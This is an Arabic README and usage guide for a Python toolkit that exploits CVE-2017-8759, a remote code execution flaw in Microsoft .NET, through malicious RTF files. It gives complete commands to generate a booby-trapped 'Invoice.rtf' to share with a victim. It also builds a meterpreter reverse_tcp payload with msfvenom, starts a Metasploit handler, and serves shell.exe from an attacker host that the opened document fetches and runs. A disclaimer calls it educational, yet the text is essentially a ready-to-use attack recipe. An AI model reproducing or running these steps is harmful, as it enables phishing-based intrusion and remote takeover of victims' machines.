
نص بايثون لتوليد ملفات RTF خبيثة تستغل CVE-2017-8759 (ثغرة تنفيذ الأوامر عن بعد في Microsoft .NET Framework) وتوصيل حمولات Metasploit/meterpreter لاختبار الاختراق.
مجموعة أدوات استغلال الثغرة CVE-2017-8759 - الإصدار 1.0 هي أداة بايثون مفيدة تزوّد مختبرِي الاختراق وباحثي الأمن بطريقة سريعة وفعالة لاختبار ثغرة تنفيذ الأوامر عن بُعد في إطار عمل مايكروسوفت .NET. يمكنها إنشاء ملف RTF ضار وتوصيل حمولة metasploit / meterpreter / حمولة أخرى إلى الضحية دون أي إعدادات معقدة.
هذا البرنامج مخصص لأغراض تعليمية فقط. لا تستخدمه دون إذن. ينطبق إخلاء المسؤولية المعتاد، خاصة أنني (bhdresh) لست مسؤولاً عن أي أضرار ناتجة عن الاستخدام المباشر أو غير المباشر للمعلومات أو الوظائف التي توفرها هذه البرامج. لا يتحمل المؤلف أو أي مزود إنترنت أي مسؤولية عن المحتوى أو سوء استخدام هذه البرامج أو أي مشتقات منها. باستخدام هذا البرنامج فإنك تقبل حقيقة أن أي ضرر (فقدان بيانات، تعطل النظام، اختراق النظام، إلخ) يسببه استخدام هذه البرامج ليس من مسؤولية bhdresh.
أخيراً، هذا تطوير شخصي، يرجى احترام فلسفته وعدم استخدامه لأغراض سيئة!
ترخيص CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/
تم إدخال الإمكانيات التالية في البرنامج النصي
- إنشاء ملف RTF ضار
- وضع الاستغلال للملف RTF الذي تم إنشاؤه
الإصدار: إصدار بايثون 2.7.13
1) إنشاء ملف RTF ضار
# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (اختياري، إذا كنت تستخدم حمولة MSF): إنشاء حمولة metasploit وبدء المعالج
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) تشغيل الأداة في وضع الاستغلال لتوصيل الحمولة المحلية
# python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe
# python cve-2017-8759_toolkit.py -h
هذه أداة مفيدة لاستغلال CVE-2017-8759 (ثغرة تنفيذ الأوامر عن بُعد في إطار عمل مايكروسوفت .NET)
الأوضاع:
-M gen إنشاء ملف ضار فقط
إنشاء ملف RTF ضار:
-w <Filename.rtf> اسم ملف RTF الضار (شارك هذا الملف مع الضحية).
-u <http://attacker.com/test.txt> مسار ملف txt عن بُعد. عادةً، يجب أن يكون هذا نطاقاً أو عنوان IP حيث تعمل هذه الأداة.
على سبيل المثال، http://attackerip.com/test.txt (سيتم تضمين عنوان URL هذا في ملف RTF الضار وسيتم طلبه بمجرد أن يفتح الضحية ملف RTF الضار.
-M exp بدء وضع الاستغلال
الاستغلال:
-p <TCP port:Default 80> رقم المنفذ المحلي.
-e <http://attacker.com/shell.exe> مسار ملف قابل للتنفيذ / شل meterpreter / حمولة يجب تنفيذها على الهدف.
-l </tmp/shell.exe> حدد المسار المحلي لملف قابل للتنفيذ / شل meterpreter / حمولة.
@bhdresh
@Voulnet, @vysec, @bhdresh
من الواضح أنني لست مطوراً متفرغاً، لذا توقع بعض المشاكل
يرجى الإبلاغ عن الأخطاء والمشكلات عبر https://github.com/bhdresh/CVE-2017-8759/issues/new